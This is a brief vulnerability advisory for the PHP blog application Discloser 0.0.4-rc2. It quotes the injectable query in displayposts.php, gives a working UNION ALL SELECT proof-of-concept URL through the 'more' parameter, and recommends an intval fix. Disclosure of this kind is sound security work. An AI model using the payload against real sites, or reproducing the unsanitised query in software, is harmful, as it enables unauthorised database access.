Discloser 0.0.4-rc2 SQL Injection

`******** Salvatore "drosophila" Fresta ********  
  
[+] Application: Discloser  
[+] Version: 0.0.4-rc2  
[+] Website: http://discloser.sourceforge.net/  
  
[+] Bugs: [A] SQL Injection  
  
[+] Exploitation: Remote  
[+] Date: 21 Feb 2004  
  
[+] Discovered by: Salvatore Fresta aka drosophila  
[+] Author: Salvatore Fresta aka drosophila  
[+] E-mail: drosophilaxxx [at] gmail.com  
  
  
***************************************************  
  
[+] Menu  
  
1) Bugs  
2) Code  
3) Fix  
  
  
***************************************************  
  
[+] Bugs  
  
  
- [A] SQL Injection  
  
[-] Risk: medium  
[-] File affected: displayposts.php  
  
This flaw allows a guest to insert arbitrary SQL   
statments in the affected query.  
  
...  
  
if (isset($_GET['more'])) {  
$more = $_GET['more'];  
$query = mysql_query("select ". $tableprefix ."posts.*, ". $tableprefix ."users.username, ". $tableprefix ."users.email from ". $tableprefix ."posts, ". $tableprefix ."users where ". $tableprefix ."posts.poster = ". $tableprefix ."users.username and ". $tableprefix ."posts.id = $more");  
  
...  
  
  
***************************************************  
  
[+] Code  
  
  
- [A] SQL Injection  
  
You can retrieve information from 3,4,7,8 fields.  
  
http://www.site.com/path/index.php?more=-1 UNION ALL SELECT 1,'long',3,4,5,6,7,8,9,10  
  
  
***************************************************  
  
[+] Fix  
  
To fix the flaw, you must to accept numeric content  
only, using, for example, intval PHP function:  
  
$more = intval($_GET['more']);  
  
  
***************************************************`